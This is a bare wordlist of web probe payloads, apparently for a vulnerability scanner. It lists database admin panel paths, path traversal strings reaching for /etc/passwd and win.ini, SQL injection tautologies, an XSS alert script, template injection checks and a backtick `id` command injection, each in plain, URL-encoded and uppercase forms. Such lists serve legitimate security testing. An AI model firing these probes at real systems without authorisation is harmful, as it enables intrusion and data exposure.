/phpmyadmin
/pma
/adminer.php
/adminer
/mongo-express
/dbadmin
/mysql
/db
test
baseline
AUROSE_PROBE
../../../../etc/passwd
..\..\..\..\windows\win.ini
' OR '1'='1
" OR "1"="1
<script>alert(1)</script>
${7*7}
{{7*7}}
`id`
127.0.0.1
http://127.0.0.1
https://example.com
%2Fphpmyadmin
%2Fpma
%2Fadminer.php
%2Fadminer
%2Fmongo-express
%2Fdbadmin
%2Fmysql
%2Fdb
..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%5C..%5C..%5C..%5Cwindows%5Cwin.ini
%27%20OR%20%271%27%3D%271
%22%20OR%20%221%22%3D%221
%3Cscript%3Ealert%281%29%3C%2Fscript%3E
%24%7B7%2A7%7D
%7B%7B7%2A7%7D%7D
%60id%60
http%3A%2F%2F127.0.0.1
https%3A%2F%2Fexample.com
/PHPMYADMIN
/PMA
/ADMINER.PHP
/ADMINER
/MONGO-EXPRESS
/DBADMIN
/MYSQL
/DB
TEST
BASELINE
../../../../ETC/PASSWD
..\..\..\..\WINDOWS\WIN.INI
<SCRIPT>ALERT(1)</SCRIPT>
`ID`
HTTP://127.0.0.1
HTTPS://EXAMPLE.COM
%2FPHPMYADMIN
%2FPMA
%2FADMINER.PHP
%2FADMINER
%2FMONGO-EXPRESS
%2FDBADMIN
%2FMYSQL
%2FDB
..%2F..%2F..%2F..%2FETC%2FPASSWD
..%5C..%5C..%5C..%5CWINDOWS%5CWIN.INI
%3CSCRIPT%3EALERT%281%29%3C%2FSCRIPT%3E
%60ID%60
HTTP%3A%2F%2F127.0.0.1
HTTPS%3A%2F%2FEXAMPLE.COM
' OR '1'%3D'1
" OR "1"%3D"1
/phpmyadmin?v=0
/phpmyadmin&v=0
%2Fphpmyadmin_0
dbexpose_0
/dbexpose/0
/phpmyadmin%0a0
/pma?v=1
/pma&v=1
